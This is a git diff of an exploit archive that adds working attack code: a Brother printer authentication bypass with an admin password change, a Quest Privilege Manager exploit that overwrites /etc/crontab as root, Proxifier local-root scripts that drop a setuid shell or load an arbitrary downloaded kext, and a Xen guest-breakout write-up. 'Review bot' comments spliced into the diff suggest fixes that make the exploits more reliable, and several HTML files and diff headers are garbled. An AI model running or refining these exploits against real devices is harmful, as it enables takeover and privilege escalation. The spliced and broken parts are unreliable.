diff --git a/files.csv b/files.csv
index cc12d8038..761bccd8a 100644
--- a/files.csv
+++ b/files.csv
@@ -5463,6 +5463,9 @@ id,file,description,date,author,platform,type,port
 41814,platforms/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 41823,platforms/windows/dos/41823.py,"CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)",2017-03-16,redr2e,windows,dos,0
 41851,platforms/windows/dos/41851.txt,"Moxa MXview 2.8 - Denial of Service",2017-04-10,hyp3rlinx,windows,dos,0
+41867,platforms/multiple/dos/41867.html,"Apple WebKit - 'JSC::B3::Procedure::resetReachability' Use-After-Free",2017-04-11,"Google Security Research",multiple,dos,0
+41868,platforms/multiple/dos/41868.html,"Apple WebKit - 'Document::adoptNode' Use-After-Free",2017-04-11,"Google Security Research",multiple,dos,0
+41869,platforms/multiple/dos/41869.html,"Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow",2017-04-11,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8928,6 +8931,9 @@ id,file,description,date,author,platform,type,port
 41771,platforms/windows/local/41771.py,"Disk Sorter Enterprise 9.5.12 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
 41772,platforms/windows/local/41772.py,"DiskBoss Enterprise 7.8.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
 41773,platforms/windows/local/41773.py,"Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
+41853,platforms/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,macos,local,0
+41854,platforms/macos/local/41854.txt,"Proxifier for Mac 2.17 / 2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",macos,local,0
+41870,platforms/multiple/local/41870.txt,"Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout",2017-04-11,"Google Security Research",multiple,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15429,6 +15435,7 @@ id,file,description,date,author,platform,type,port
 41825,platforms/windows/remote/41825.txt,"SpiceWorks 7.5 TFTP - Remote File Overwrite / Upload",2017-04-05,hyp3rlinx,windows,remote,0
 41850,platforms/windows/remote/41850.txt,"Moxa MXview 2.8 - Private Key Disclosure",2017-04-10,hyp3rlinx,windows,remote,0
 41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0
+41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37721,3 +37728,14 @@ id,file,description,date,author,platform,type,port
 41845,platforms/php/webapps/41845.txt,"WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80
 41846,platforms/php/webapps/41846.html,"WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80
 41849,platforms/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,php,webapps,0
+41855,platforms/xml/webapps/41855.sh,"Adobe Multiple Products - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",xml,webapps,8400
+41856,platforms/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps,0
+41858,platforms/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps,0
+41859,platforms/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' Parameter SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps,0
+41857,platforms/php/webapps/41857.txt,"WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection",2017-04-11,"Manuel García Cárdenas",php,webapps,80
+41860,platforms/php/webapps/41860.txt,"MyBB < 1.8.11 - 'email' MyCode Cross-Site Scripting",2017-04-11,"Zhiyang Zeng",php,webapps,80
+41862,platforms/php/webapps/41862.txt,"MyBB smilie Module < 1.8.11 - 'pathfolder' Directory Traversal",2017-04-11,"Zhiyang Zeng",php,webapps,80
+41863,platforms/hardware/webapps/41863.php,"Brother MFC-J6520DW - Authentication Bypass / Password Change",2017-04-11,"Patryk Bogdan",hardware,webapps,0
+41864,platforms/php/webapps/41864.txt,"Horde Groupware Webmail 3 / 4 / 5 - Multiple Remote Code Execution",2017-04-11,SecuriTeam,php,webapps,0
+41865,platforms/multiple/webapps/41865.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting",2017-04-11,"Google Security Research",multiple,webapps,0
+41866,platforms/multiple/webapps/41866.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element",2017-04-11,"Google Security Research",multiple,webapps,0
diff --git a/platforms/hardware/webapps/41863.php b/platforms/hardware/webapps/41863.php
new file mode 100755
index 000000000..bedb5421f
--- /dev/null
+++ b/platforms/hardware/webapps/41863.php
@@ -0,0 +1,204 @@
+ ASCII hex --> md5
+(e.g. AuthCookie=c243a9ee18a9327bfd419f31e75e71c7 for 'test' password)
+
+This information can be used to crack current password from exported cookie.
+
+Fix:
+Minimize network access to Brother MFC device or disable HTTP(S) interface.
+
+Confirmed vulnerable:
+MFC-J6973CDW
+MFC-J4420DW
+MFC-8710DW
+MFC-J4620DW
+MFC-L8850CDW
+MFC-J3720
+MFC-J6520DW
+MFC-L2740DW
+MFC-J5910DW
+MFC-J6920DW
+MFC-L2700DW
+MFC-9130CW
+MFC-9330CDW
+MFC-9340CDW
+MFC-J5620DW
+MFC-J6720DW
+MFC-L8600CDW
+MFC-L9550CDW
+MFC-L2720DW
+DCP-L2540DW
+DCP-L2520DW
+HL-3140CW
+HL-3170CDW
+HL-3180CDW
+HL-L8350CDW
+HL-L2380DW
+ADS-2500W
+ADS-1000W
+ADS-1500W
+
+For educational purposes only.
+
+*/
+
+
+/* ----------------------------- */
+
+$address = "http://192.168.1.111";
+
+//$mode = "silent";
+
+$mode = "changepass";
+$newpass = "letmein";
+
+
+/* ----------------------------- */
+
+$user_agent = 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0';
+$address = preg_replace('{/$}', '', $address);
+libxml_use_internal_errors(true);
+
+function getPwdValue($address) {
+
+ global $user_agent;
+
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, $address."/admin/password.html");
+ curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
+ curl_setopt($ch, CURLOPT_COOKIE, getCookie($address));
+ curl_setopt($ch, CURLOPT_HEADER, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
+ $content = curl_exec($ch);
+
+ $dom = new DOMDocument();
+ $dom->loadHTML($content);
+ $inputs = $dom->getElementsByTagName('input');
+ foreach($inputs as $i) {
+ if($i->getAttribute('id') === $i->getAttribute('name') && $i->getAttribute('type') === 'password') {
+ return $i->getAttribute('name');
+ }
+ }
+
+}
+
+function getLogValue($address) {
+
+ global $user_agent;
+
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, $address);
+ curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
+ curl_setopt($ch, CURLOPT_HEADER, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
+ $content = curl_exec($ch);
+
+ $dom = new DOMDocument();
+ $dom->loadHTML($content);
+
+ if(strstr($dom->getElementsByTagName('a')->item(0)->nodeValue, 'Please configure the password')) {
+ print 'Seems like password is not set! Exiting.'; exit; }
+
+ $value = $dom->getElementById('LogBox')->getAttribute('name');
+ return $value;
+
+}
+
+function getCookie($host) {
+
+ global $address, $user_agent;
+
+ $log_var = getLogValue($address);
+
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, $address."/general/status.html");
+ curl_setopt($ch, CURLOPT_POST, 1);
+ curl_setopt($ch, CURLOPT_POSTFIELDS,
+ $log_var."=xyz&loginurl=%2Fgeneral%2Fstatus.html");
+ curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
+ curl_setopt($ch, CURLOPT_HEADER, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
+ $content = curl_exec($ch);
+
+ if($content == true) {
+ $cookies = array();
+ preg_match_all('/Set-Cookie:(?\s{0,}.*)$/im', $content, $cookies);
+
+ if(!empty($cookies['cookie'])) {
+ $exploded = explode(';', $cookies['cookie'][0]);
+ } else { print 'Failed getting cookies for '.$address.' address - check your settings'; exit; }
+ } else { print 'Got error requesting '.$address.' address - check your settings'; exit; }
+
+ return trim($exploded[0]);
+
+}
+
+if($mode === "silent") {
+
+ print 'Here\'s your authorization cookie: '.getCookie($address);
+
+} elseif ($mode === "changepass") {
+
+ global $address, $newpass;
+
+ $cookie = getCookie($address);
+ $pwd_var = getPwdValue($address);
+
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, $address."/admin/password.html");
+ curl_setopt($ch, CURLOPT_POST, 1);
+ curl_setopt($ch, CURLOPT_POSTFIELDS,
+ "pageid=1&".$pwd_var."=".$newpass."&temp_retypePass=".$newpass);
+ curl_setopt($ch, CURLOPT_COOKIE, $cookie);
+ curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
+ curl_setopt($ch, CURLOPT_HEADER, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
+ $content = curl_exec($ch);
+
+ if($content == true) {
+ print 'Password changed to: '.$newpass;
+ } else { print 'Got error requesting '.$address.' address - check your settings'; exit; }
+
+}
+
+?>
diff --git a/platforms/linux/remote/41861.py b/platforms/linux/remote/41861.py
new file mode 100755
index 000000000..41cfe124e
--- /dev/null
+++ b/platforms/linux/remote/41861.py
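Review bot: `getLogValue` and `getPwdValue` hand the result of `curl_exec` to `DOMDocument::loadHTML` without checking it, so when the request fails `$content` is `false`, `getElementById('LogBox')` returns null and the script aborts on a method call on null instead of printing the 'check your settings' message that `getCookie` and the changepass branch print; `if ($content === false) { print 'Got error requesting '.$address.' address - check your settings'; exit; }` after each `curl_exec` would make the three paths consistent. The pattern in `getCookie`, `'/Set-Cookie:(?\s{0,}.*)$/im'`, carries no group name as rendered here although the code then reads `$cookies['cookie']`; this looks like a named group lost in extraction and should be checked against the committed file, since as written `preg_match_all` rejects the pattern and the script always exits on the 'Failed getting cookies' branch. `getCookie($host)` never uses `$host` and reads the global `$address` instead, and the `global $address, $newpass;` at file scope is a no-op; either using the parameter or dropping it would make the call sites less misleading.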
@@ -0,0 +1,145 @@
+#!/usr/bin/env python2
+
+"""
+# Exploit Title: Quest Privilege Manager pmmasterd Arbitrary File Write
+# Date: 10/Mar/2017
+# Exploit Author: m0t
+# Vendor Homepage: https://www.quest.com/products/privilege-manager-for-unix/
+# Version: 6.0.0-27, 6.0.0-50
+# Tested on: ubuntu 14.04 x86_64, ubuntu 16.04 x86, ubuntu 12.04 x86
+# CVE : 2017-6554
+
+REQUIREMENTS
+- Root privs are required to bind a privileged source port
+- python hexdump: pip install hexdump
+
+
+This PoC gains arbitrary command execution by overwriting /etc/crontab
+In case of successful exploitation /etc/crontab will contain the following line
+* * * * * root touch /tmp/pwned
+
+
+"""
+
+import binascii as b
+import hexdump as h
+import struct
+import sys
+import socket
+from Crypto.Cipher import AES
+
+cipher=None
+def create_enc_packet(action, len1=None, len2=None, body=None):
+ global cipher
+ if body == None:
+ body_raw = b.unhexlify("50696e6745342e362e302e302e32372e")
+ else:
+ body_raw = b.unhexlify(body)
+ #pad
+ if len(body_raw) % 16 != 0:
+ body_raw += "\x00" * (16 - (len(body_raw) % 16))
+ enc_body = cipher.encrypt(body_raw)
+
+ if len1 == None:
+ len1 = len(body_raw)
+ if len2 == None:
+ len2 = len(enc_body)
+ head = struct.pack('>I', action) + struct.pack('>I', len1) + struct.pack('>I', len2) + '\x00'*68
+ return head+enc_body
+
+def decrypt_packet(packet):
+ global cipher
+ return cipher.decrypt(packet[80:])
+
+def create_packet(action, len1=None, len2=None, body=None):
+ if body == None:
+ body = "50696e6745342e362e302e302e32372e"
+ if len1 == None:
+ len1 = len(body)/2
+ if len2 == None:
+ len2 = len1
+ head = struct.pack('>I', action) + struct.pack('>I', len1) + struct.pack('>I', len2) + '\x00'*68
+ return head+b.unhexlify(body)
+
+#extract action code from first 4b, return action found
+def get_action(packet):
+ code = struct.unpack('>I',packet[:4])[0]
+ return code
+
+def generate_aes_key(buf):
+ some_AES_bytes = [
+ 0xDF, 0x4E, 0x34, 0x05, 0xF4, 0x4D, 0x19, 0x22, 0x98, 0x4F,
+ 0x58, 0x62, 0x2C, 0x2A, 0x54, 0x42, 0xAA, 0x76, 0x53, 0xD4,
+ 0xF9, 0xDC, 0x98, 0x90, 0x23, 0x49, 0x71, 0x12, 0xEA, 0x33,
+ 0x12, 0x63
+ ];
+ retbuf = ""
+ if len(buf) < 0x20:
+ print("[-] initial key buffer too small, that's bad")
+ return None
+ for i in range(0x20):
+ retbuf+= chr(ord(buf[i])^some_AES_bytes[i])
+ return retbuf
+
+def main():
+ global cipher
+
+ if len(sys.argv) < 2:
+ print("usage: %s []" % sys.argv[0])
+ sys.exit(-1)
+
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+ if len(sys.argv) > 2:
+ sport = int(sys.argv[2])
+ else:
+ sport = 666
+
+ s.bind(("0.0.0.0", sport))
+ s.connect((sys.argv[1], 12345))
+
+
+ try:
+ s.send(create_packet(0xfa, body=b.hexlify("/etc/crontab")))
+ #s.send(create_packet(0x134))
+ print("[+] sent ACT_NEWFILESENT")
+ resp=s.recv(1024)
+ h.hexdump(resp)
+ action=get_action(resp)
+ if action == 212:
+ print("[+] server returned 212, this is a good sign, press Enter to continue")
+ else:
+ print("[-] server returned %d, exploit will probably fail, press CTRL-C to exit or Enter to continue" % action)
+ sys.stdin.readline()
+ print("[+] exchanging DH pars")
+ dh="\x00"*63+"\x02"
+ s.send(dh)
+ dh=s.recv(1024)
+ h.hexdump(dh)
+ aes_key = generate_aes_key(dh)
+ print("[+] got AES key below:")
+ h.hexdump(aes_key)
+ cipher=AES.new(aes_key)
+ print("[+] press Enter to continue")
+ sys.stdin.readline()
+
+ print("[+] sending:")
+ enc=create_enc_packet(0xfb, body=b.hexlify("* * * * * root touch /tmp/pwned\n"))
+ h.hexdump(enc)
+ s.send(enc )
+ enc=create_enc_packet(0xfc, body="")
+ h.hexdump(enc)
+ s.send(enc )
+
+ print("[+] got:")
+ resp=s.recv(1024)
+ h.hexdump(resp)
+ print("[+] trying decrypt")
+ h.hexdump(decrypt_packet(resp))
+
+ s.close()
+ except KeyboardInterrupt:
+ s.close()
+ exit(-1)
+
+main()
\ No newline at end of file
diff --git a/platforms/macos/local/41853.txt b/platforms/macos/local/41853.txt
new file mode 100755
index 000000000..dff12fe60
--- /dev/null
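Review bot: `main` never checks for the `None` that `generate_aes_key` returns when the DH reply is shorter than 32 bytes, so `h.hexdump(aes_key)` and `AES.new(aes_key)` fail with a TypeError right after the function has printed its own `[-]` diagnostic; `if aes_key is None: s.close(); sys.exit(-1)` after the call would exit cleanly. `AES.new(aes_key)` relies on the library's default block mode; naming it explicitly (`AES.MODE_ECB` is the PyCrypto default) documents the framing the peer expects instead of leaving it to a default that other AES implementations do not share. The socket is closed only on `KeyboardInterrupt`, so any `socket.error` from `recv`/`send` leaves cleanup to interpreter exit — a `try`/`finally` with `s.close()` covers every path, and `sys.exit(-1)` is preferable to the bare `exit(-1)` builtin in a script. The usage string `"usage: %s []"` has lost its placeholders in this rendering (presumably the host and the optional source port that the code reads from `sys.argv[1]` and `sys.argv[2]`), so the committed text should be confirmed.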
+++ b/platforms/macos/local/41853.txt 
@@ -0,0 +1,61 @@
+Source: https://www.securify.nl/advisory/SFY20170401/multiple_local_privilege_escalation_vulnerabilities_in_proxifier_for_mac.html
+
+Abstract
+
+Multiple local privileges escalation vulnerabilities were found in the KLoader binary that ships with Proxifier. KLoader is responsible for loading a Kernel Extension (kext). KLoader is installed setuid root, it accepts one or two command line arguments that are used in a number of system commands. These arguments are used in an insecure manner allowing a local attacker to elevate its privileges. In addition, the environment is not properly sanitized, which also introduces a possibility to run arbitrary commands with elevated privileges.
+
+Tested versions
+
+These issues were successfully verified on Proxifier for Mac v2.18.
+
+Fix
+
+Proxifier v2.19 was released that addresses these issues.
+
+Introduction
+
+Proxifier is a program that allows network applications that do not support proxy servers to operate through a SOCKS or HTTPS proxy or a chain of proxy servers. Multiple privilege escalation vulnerabilities were found in the KLoader binary that ships with Proxifier. These vulnerabilities allow a local user to gain elevated privileges (root).
+
+KLoader is responsible for loading the ProxifierS.kext Kernel Extension (kext). Loading kext files requires root privileges. Because of this the setuid bit is set on this binary when Proxifier is started for the first time. KLoader accepts one or two command line arguments that are used in a number of system commands. These arguments are used in an insecure manner allowing a local attacker to elevate its privileges. In addition, the environment is not properly sanitized, which also introduces a possibility to run arbitrary commands with elevated privileges.
+
+Unsanitized PATH environment variable
+
+The KLoader binary executes a number of system commands. The commands are executed from a relative path. The PATH environment variable is not sanitized before these commands are run. The PATH variable is changed by KLoader, but all that happens is that a hardcoded path is appended to current value of PATH. Due to this, it is possible for a local attacker to set an arbitrary PATH variable such that the attacker's folder is search first. Commands that are started from a relative path - and thus allow for privileges escalation - include:
+
+- cp
+- mkdir
+- tar
+- kextstat
+- kextload
+
+Proof of concept
+
+cd /tmp
+export PATH=.:$PATH
+echo -e "#/bin/bash\nid" > cp
+chmod +x cp
+/Applications/Proxifier.app/Contents/KLoader lpe
+
+Command injection in KLoader
+
+The command line arguments that are passed to Kloader are not validated and/or sanitized. These arguments are used as-is when construction system commands. This allows an local attacker to cause Kloader to execute arbitrary commands with root privileges.
+
+Proof of concept
+
+$ /Applications/Proxifier.app/Contents/KLoader ';id #'
+usage: cp [-R [-H | -L | -P]] [-fi | -n] [-apvX] source_file target_file
+cp [-R [-H | -L | -P]] [-fi | -n] [-apvX] source_file ... target_directory
+uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),[...]
+
+Loading of arbitrary kext files
+
+The main purpose of KLoader is to load ProxifierS.kext. The first command line argument is the path to the kext file, which normally is /Applications/Proxifier.app/Contents/ProxifierS.kext/. However since the first argument can be fully controlled by an attacker it is actually possible for a local unprivileged user to load any arbitrary kext file. The proof of concept below tries to OSXPMem Kernel Extension from the Rekall Forensic Framework.
+
+Proof of concept
+
+curl -L https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip --output osxpmem-2.1.post4.zip
+unzip osxpmem-2.1.post4.zip
+cd osxpmem.app/MacPmem.kext/
+tar cvzf lpe.tar.gz Contents/
+/Applications/Proxifier.app/Contents/KLoader lpe.tar.gz
+kextstat -l -b com.google.MacPmem
\ No newline at end of file
diff --git a/platforms/macos/local/41854.txt b/platforms/macos/local/41854.txt
new file mode 100755
index 000000000..06dfd009e
--- /dev/null
+++ b/platforms/macos/local/41854.txt
@@ -0,0 +1,51 @@ +# Source: https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html + +Proxifier 2.18 (also 2.17 and possibly some earlier version) ships with a +KLoader binary which it installs suid root the first time Proxifier is run. This +binary serves a single purpose which is to load and unload Proxifier's kernel +extension. + +Unfortunately it does this by taking the first parameter passed to it on the +commandline without any sanitisation and feeding it straight into system(). + +This means not only can you load any arbitrary kext as a non-root user but you +can also get a local root shell. + +Although this is a bit of a terrible bug that shouldn't be happening in 2017, +Proxifier's developers fixed the issue in record time so that's something! + +Everyone using Proxifier for Mac should update to 2.19 as soon as possible. + +https://m4.rkw.io/proxifier_privesc.sh.txt +6040180f672a2b70511a483e4996d784f03e04c624a8c4e01e71f50709ab77c3 +------------------------------------------------------------------- + +#!/bin/bash + +##################################################################### +# Local root exploit for vulnerable KLoader binary distributed with # +# Proxifier for Mac v2.18 # +##################################################################### +# by m4rkw # +##################################################################### + +cat > a.c < +#include + +int main() +{ + setuid(0); + seteuid(0); + + execl("/bin/bash", "bash", NULL); + return 0; +} +EOF + +gcc -o /tmp/a a.c +rm -f a.c +/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a' +/tmp/a + +------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/multiple/dos/41867.html b/platforms/multiple/dos/41867.html new file mode 100755 index 000000000..2c83166b9 --- /dev/null +++ b/platforms/multiple/dos/41867.html 
@@ -0,0 +1,135 @@ + + +(function () { + for (var i = 0; i < 1000000; ++i) { + const v = Array & 1 ? v : 1; + typeof o <= 'object'; + } +}()); + + \ No newline at end of file diff --git a/platforms/multiple/dos/41868.html b/platforms/multiple/dos/41868.html new file mode 100755 index 000000000..0e1e5e4df --- /dev/null +++ b/platforms/multiple/dos/41868.html @@ -0,0 +1,185 @@ + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/41869.html b/platforms/multiple/dos/41869.html new file mode 100755 index 000000000..eb045c109 --- /dev/null +++ b/platforms/multiple/dos/41869.html @@ -0,0 +1,151 @@ + + +(function (x = 0) { + var a; + { + function arguments() { + } + + function b() { + var g = 1; + a[5]; + } + + f(); + g(); + } +}()); + + \ No newline at end of file diff --git a/platforms/multiple/local/41870.txt b/platforms/multiple/local/41870.txt new file mode 100755 index 000000000..3997ca064 --- /dev/null +++ b/platforms/multiple/local/41870.txt 
@@ -0,0 +1,222 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184 + +This bug report describes a vulnerability in memory_exchange() that +permits PV guest kernels to write to an arbitrary virtual address with +hypervisor privileges. The vulnerability was introduced through a +broken fix for CVE-2012-5513 / XSA-29. + +The fix for CVE-2012-5513 / XSA-29 introduced the following check in +the memory_exchange() hypercall handler: + + if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) || + !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) ) + { + rc = -EFAULT; + goto fail_early; + } + +guest_handle_okay() calls array_access_ok(), which calls access_ok(), +which is implemented as follows: + + /* + * Valid if in +ve half of 48-bit address space, or above + * Xen-reserved area. + * This is also valid for range checks (addr, addr+size). As long + * as the start address is outside the Xen-reserved area then we + * will access a non-canonical address (and thus fault) before + * ever reaching VIRT_START. + */ + #define __addr_ok(addr) \ + (((unsigned long)(addr) < (1UL<<47)) || \ + ((unsigned long)(addr) >= HYPERVISOR_VIRT_END)) + + #define access_ok(addr, size) \ + (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size)) + +As the comment states, access_ok() only checks the address, not the +size, if the address points to guest memory, based on the assumption +that any caller of access_ok() will access guest memory linearly, +starting at the supplied address. Callers that want to access a +subrange of the memory referenced by a guest handle are supposed to +use guest_handle_subrange_okay(), which takes an additional start +offset parameter, instead of guest_handle_okay(). + +memory_exchange() uses guest_handle_okay(), but only accesses the +guest memory arrays referenced by exch.in.extent_start and +exch.out.extent_start starting at exch.nr_exchanged, a 64-bit offset. 
+The intent behind exch.nr_exchanged is that guests always set it to 0 +and nonzero values are only set when a hypercall has to be restarted +because of preemption, but this isn't enforced. + +Therefore, by invoking this hypercall with crafted arguments, it is +possible to write to an arbitrary memory location that is encoded as + + exch.out.extent_start + 8 * exch.nr_exchanged + +where exch.out.extent_start points to guest memory and +exch.nr_exchanged is an attacker-chosen 64-bit value. + + +I have attached a proof of concept. This PoC demonstrates the issue by +overwriting the first 8 bytes of the IDT entry for #PF, causing the +next pagefault to doublefault. To run the PoC, unpack it in a normal +64-bit PV domain and run the following commands in the domain as root: + +root@pv-guest:~# cd crashpoc +root@pv-guest:~/crashpoc# make -C /lib/modules/$(uname -r)/build M=$(pwd) +make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic' + LD /root/crashpoc/built-in.o + CC [M] /root/crashpoc/module.o +nasm -f elf64 -o /root/crashpoc/native.o /root/crashpoc/native.asm + LD [M] /root/crashpoc/test.o + Building modules, stage 2. + MODPOST 1 modules +WARNING: could not find /root/crashpoc/.native.o.cmd for /root/crashpoc/native.o + CC /root/crashpoc/test.mod.o + LD [M] /root/crashpoc/test.ko +make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic' +root@pv-guest:~/crashpoc# insmod test.ko +root@pv-guest:~/crashpoc# rmmod test + +The machine on which I tested the PoC was running Xen 4.6.0-1ubuntu4 +(from Ubuntu 16.04.2). 
Executing the PoC caused the following console +output: + +(XEN) *** DOUBLE FAULT *** +(XEN) ----[ Xen-4.6.0 x86_64 debug=n Tainted: C ]---- +(XEN) CPU: 0 +(XEN) RIP: e033:[<0000557b46f56860>] 0000557b46f56860 +(XEN) RFLAGS: 0000000000010202 CONTEXT: hypervisor +(XEN) rax: 00007fffe9cfafd0 rbx: 00007fffe9cfd160 rcx: 0000557b47ebd040 +(XEN) rdx: 0000000000000001 rsi: 0000000000000004 rdi: 0000557b47ec52e0 +(XEN) rbp: 00007fffe9cfd158 rsp: 00007fffe9cfaf30 r8: 0000557b46f7df00 +(XEN) r9: 0000557b46f7dec0 r10: 0000557b46f7df00 r11: 0000557b47ec5878 +(XEN) r12: 0000557b47ebd040 r13: 00007fffe9cfb0c0 r14: 0000557b47ec52e0 +(XEN) r15: 0000557b47ed5e70 cr0: 0000000080050033 cr4: 00000000001506a0 +(XEN) cr3: 0000000098e2e000 cr2: 00007fffe9cfaf93 +(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: e02b cs: e033 +(XEN) +(XEN) **************************************** +(XEN) Panic on CPU 0: +(XEN) DOUBLE FAULT -- system shutdown +(XEN) **************************************** +(XEN) +(XEN) Reboot in five seconds... + + +I strongly recommend changing the semantics of access_ok() so that it +guarantees that any access to an address inside the specified range is +valid. Alternatively, add some prefix, e.g. "UNSAFE_", to the names of +access_ok() and appropriate wrappers to prevent people from using +these functions improperly. Currently, in my opinion, the function +name access_ok() is misleading. + +Proof of Concept: xen_memory_exchange_crashpoc.tar + +################################################################################ + +I have written an exploit (attached). + +Usage (in an unprivileged PV guest with kernel headers, gcc, make, nasm and hexdump): + + +root@pv-guest:~/privesc_poc# ./compile.sh +make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic' + LD /root/privesc_poc/built-in.o + CC [M] /root/privesc_poc/module.o +nasm -f elf64 -o /root/privesc_poc/native.o /root/privesc_poc/native.asm + LD [M] /root/privesc_poc/test.o + Building modules, stage 2. 
